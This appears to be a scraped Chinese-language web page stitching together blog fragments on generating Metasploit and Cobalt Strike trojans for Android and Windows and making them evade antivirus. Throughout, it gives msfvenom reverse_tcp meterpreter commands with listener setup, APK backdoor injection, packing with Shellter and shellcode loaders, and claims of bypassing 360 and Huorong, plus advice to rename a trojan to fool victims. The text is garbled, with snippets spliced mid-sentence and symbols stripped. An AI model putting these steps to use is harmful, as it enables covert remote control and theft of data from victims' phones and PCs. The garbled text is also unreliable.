1、渗透机kali20173 靶机安卓手机一部 首先msf生成的apk免杀我们需要生成一个安卓木马 至于木马的免杀暂且不谈然后打开msfconsole 然后执行 获取一个安卓手机的session,我们可以获取当前通话记录,聊天短信等信息 下面是我从网上找的一些参数的释义剩下的就自个慢慢玩吧,我就先撤msf生成的apk免杀了;测试系统为windows10 1909,使用360安全卫士杀毒软件,测试过程中利用在线杀毒VT进行辅助分析在payload生成阶段,直接利用msfvenom命令生成了一个windowsmeterpreterreverse_tcp类型的payload,参数包括LHOST和LPORT然而,原始payload完全被360安全卫士查杀,VT查杀率为5569为了解决免杀问题,尝试使用ms。
2、python mainpy lhost youip lport youport n vxapk 填写公网IP与端口,本地映射至12700011145端口 生成注入成功的apk与监听脚本 远控Apk位于root520apkhookWorkDirAllFinishapk 监听脚本位于root520apkhookWorkDirhandlerrc 3下载并安装apk 4启动脚本监听 msfconsole;CS生成PowerShell上线脚本,使用CS自带的web功能,Win7与Win10均可正常上线MSF生成PowerShell上线脚本,使用MSFvenom生成,Python开启;首先,生成一个免杀的MSF木马,使用命令 msfvenom p windowsx64meterpreterreverse_tcp LHOST= LPORT=4444 f exe expexe,其中LHOST是你的vps地址,LPORT是监听端口接着,配置MSF监听端口,使用命令 use exploitmultihandler,设置payload为payload windowsx64meterpreter。
3、在浏览GitHub时,发现了一个名为Xencrypt的PowerShell免杀项目该项目的恶意脚本由msf生成,具备不错的免杀效果出于严谨的学习态度,本文作者对Xencrypt的免杀思路和加密过程进行了分析以下是学习心得与各位安全专家共同探讨的内容免杀前免杀后一免杀思路作者的免杀策略主要包括两个方面一是对抗;在这里,我们生成一个testexe的木马文件文件在root文件夹下,控制端的ip为30,端口号为4444然后利用这个木马传给靶机,可以改一改名字,比如 坦白说查看器之类的,杀毒软件可能报毒,其实是需要免杀处理的,后面学了再说吧2 利用msfconsole监听 启动msfconsole#160 漫长的;利用msfvenom生成py脚本创建setuppy 这里我们打包生成exe 使用msf进行监听我测试的时候是使用下面的命令进行监听 运行生成的demoexe,成功反弹免杀是真的牛批综上,经过本地测试和virustotal检测免杀效果py2exe TheFatRat Shellter Veil = AVIator Veil生成的恶意程序上传到带有腾讯。
4、工具地址 shellcodeloader 不想自己编译,就用工具作者自己编译的成品, realse MSF生成 bin 文件msfvenom p windowsx64meterpreter_reverse_tcp LHOST=IP LPORT=port f raw o 1bin 将生成好的木马 1bin 拖入 shellcodeloader 中,并勾选所需配置,配置的选择原项目中介绍的很清楚;这样我们就在root路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈现在我们在来启动MSF工具 输入命令msfconsole 然后输入1 use exploitmultihandler 加载模块 2 set payload androidmeterpreterreverse_tcp 选择Payload 3show options 查看参数设置 我们看见payload里边有两个参;在实践中,免杀策略可以通过多种途径实现一种方法是利用Metasploit框架中的MSF编码器,通过重新编码生成的木马,以避免被病毒检测引擎识别具体步骤包括使用`msfvenom`命令生成木马文件,然后通过MSF编码器对木马进行多次编码处理,确保生成的文件在不同反病毒引擎扫描下不易被识别最终,将生成的木马文件上;首先,使用msfvenom生成没有加壳的exe文件,代码如下msfvenom p windowsmeterpreterreverse_tcp LHOST=28 LPORT=6666 f exe optshellexe然后,将生成的exe文件放入Windows2003系统中进行木马检测,结果显示为木马文件接着,利用shellter对上述exe文件进行免杀处理在Kali环境。
5、注理论来说无论是cs还是msf生成的shellcode都可以进行免杀,不过再处理时是以cs为基准对shellcode进行处理的,不保证msf的shellcode也可以免杀后正确执行 关于CobaltStrike和Metasploit的使用可以参考我们的公开wiki CS CobaltStrikehtml MSF;4 运行backdoorapk工具,按照提示操作完成后门注入接下来,在后门注入完成后,面对应用安装后无法正常使用功能的问题,我们需为应用添加必要的权限通过以下步骤完成权限声明1 查找并获取生成的应用文件2 使用Apktool反编译应用,找到AndroidManifestxml文件3 通过msf生成的原始payload文件反;测试中,32位加壳工具对Windows Meterpreter生成的木马进行了处理,结果显示360安全卫士与火绒安全软件未能查杀该木马,成功上线同样,对Cobalt Strike原生exe进行加壳后,木马同样免杀了上述两种软件,表明该加壳方法有效另一款支持64位程序的加壳工具,对原生msf木马加壳后,能成功绕过360全家桶,但被火绒。
发表评论